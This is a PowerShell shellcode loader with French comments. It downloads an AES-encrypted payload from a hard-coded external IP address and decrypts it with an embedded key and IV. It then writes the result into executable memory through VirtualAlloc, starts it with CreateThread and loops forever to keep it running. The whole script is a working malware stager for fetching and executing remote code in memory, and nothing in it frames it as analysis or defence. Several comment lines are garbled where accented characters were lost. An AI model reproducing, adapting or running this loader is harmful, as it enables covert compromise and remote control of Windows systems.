# --- Configuration ---
AES (256-bit
32 octets)
$key = [Convert]::FromBase64String("52WxWGn0T81l1RO8lsuR7U/kJw7Xx0uw26/N7gqBCsw=")
# IV (Initialization Vector) - 16 octets
$iv = [Convert]::FromBase64String("3A92X+ZQOrDKJ2jODNXp3A==")
# URL du payload chiffr
$url = "http://212.227.245.12/payload.bin"
charger en m
$webclient = New-Object System.Net.WebClient
$encrypted = $webclient.DownloadData($url)
chiffrement AES
$aes = [System.Security.Cryptography.AesManaged]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::None
$aes.Key = $key
$aes.IV = $iv
$decryptor = $aes.CreateDecryptor()
$plaintext = $decryptor.TransformFinalBlock($encrypted, 0, $encrypted.Length)
# Allocation m
moire ex
cutable
$VirtualAlloc = Add-Type -MemberDefinition @"
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
"@ -Name "Win32" -Namespace "PInvoke" -PassThru
$exec = $VirtualAlloc::VirtualAlloc(0, $plaintext.Length, 0x1000 -bor 0x2000, 0x40)
# Injection du shellcode
[System.Runtime.InteropServices.Marshal]::Copy($plaintext, 0, $exec, $plaintext.Length)
cution dans un thread
$CreateThread = Add-Type -MemberDefinition @"
[DllImport("kernel32")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, out UInt32 lpThreadId);
"@ -Name "Threading" -Namespace "PInvoke" -PassThru
$null = $CreateThread::CreateThread(0, 0, $exec, 0, 0, [ref]0)
# Boucle passive pour garder le shellcode actif
while ($true) { Start-Sleep -Seconds 10 }